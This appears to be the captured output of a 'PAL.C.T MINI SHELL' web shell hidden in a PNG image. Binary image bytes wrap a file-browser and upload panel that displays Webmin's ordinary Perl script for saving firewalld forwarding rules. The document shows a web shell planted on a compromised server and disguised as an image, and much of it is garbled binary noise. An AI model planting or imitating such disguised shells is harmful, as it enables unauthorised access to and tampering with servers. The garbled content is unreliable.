php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewalld/
upload
files >> //usr/libexec/webmin/firewalld/save_forward.cgi

#!/usr/bin/perl
# Create, update or delete a forwarding rule

use strict;
use warnings;
no warnings 'redefine';
no warnings 'uninitialized';
require './firewalld-lib.pl';
our (%in, %text);
&error_setup($text{'forward_err'});
&ReadParse();

# Get the zone and rule
my @zones = &list_firewalld_zones();
my ($zone) = grep { $_->{'name'} eq $in{'zone'} } @zones;
$zone || &error($text{'port_ezone'});
my ($oldport, $oldproto, $olddstport, $olddstaddr);
if ($in{'id'}) {
	($oldport, $oldproto, $olddstport, $olddstaddr) =
		split(/\//, $in{'id'});
	}

my $logport;
if ($in{'delete'}) {
	# Just remove the existing rule
	my $err = &delete_firewalld_forward($zone, $oldport, $oldproto,
					    $olddstport, $olddstaddr);
	&error($err) if ($err);
	$logport = $oldport;
	}
else {
	# Validate inputs
	my $port = &parse_port_field(\%in, '');
	my $proto = $in{'proto'};
	my $dstport = &parse_port_field(\%in, 'dst');
	my $dstaddr;
	if (!$in{'dstaddr_def'}) {
		&check_ipaddress($in{'dstaddr'}) ||
			&error($text{'forward_edstaddr'});
		$dstaddr = $in{'dstaddr'};
		}
	$dstport || $dstaddr || &error($text{'forward_eneither'});

	# Create or update forward
	if (!$in{'new'}) {
		my $err = &delete_firewalld_forward($zone, $oldport, $oldproto,
						    $olddstport, $olddstaddr);
		&error($err) if ($err);
		}
	my $err = &create_firewalld_forward($zone, $port, $proto,
					    $dstport, $dstaddr);
	&error($err) if ($err);
	$logport = $port;
	}
&webmin_log($in{'delete'} ? 'delete' : $in{'new'} ? 'create' : 'update',
	    'forward', $logport);
&redirect("index.cgi?zone=".&urlize($zone->{'name'}));
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`